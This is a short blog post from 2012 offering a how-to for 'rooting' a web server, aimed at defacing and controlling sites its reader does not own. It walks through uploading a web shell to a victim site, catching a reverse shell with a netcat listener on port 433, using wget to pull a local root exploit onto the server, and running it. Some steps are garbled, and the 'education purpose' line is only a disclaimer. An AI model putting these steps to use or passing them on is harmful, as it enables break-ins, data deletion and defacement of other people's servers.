d0837296baef4fc14d667832c1a5215944b54a8f46af2d5c5c Root - Rooting a webserver | TipsS And TricksS

Root - Rooting a webserver

on Thursday, 3 May 2012




Root A webserver 
 Rooting :- Getting access to the remote system is called rooting.
If you get access to the remote system you can do anything ( delete or copy anything from the server or into the server)  and you can deface all sites which is available in the server.

Get a root access

Need a shelled site
Local root exploit for the site ( check on exploits )
Net cat
Netcat ( download link )
click here

Let's Start
First upload a shell in a site open your shell you see at the top kernel version of the site.
Now open netcat
        Type :-  -lnvp 433    (hit enter)
Now go back to the shell open the back connect option change the port 433 (hit enter)

 Find the local root version ( google it)
Now type wget link of the local root.c in the netcat (hit enter)
Chmod 777 localroot.c (hit enter)
It will be transformed into local root then type chmod 777 local
Now execute exploit type ./local root (hit enter) 
It will start rooting the server and the server is rooted

Video tutorial coming soon .. :D
Only for education purpose
i hope this is help ful to you... dont forget to share it...
 

0 comments:

Post a Comment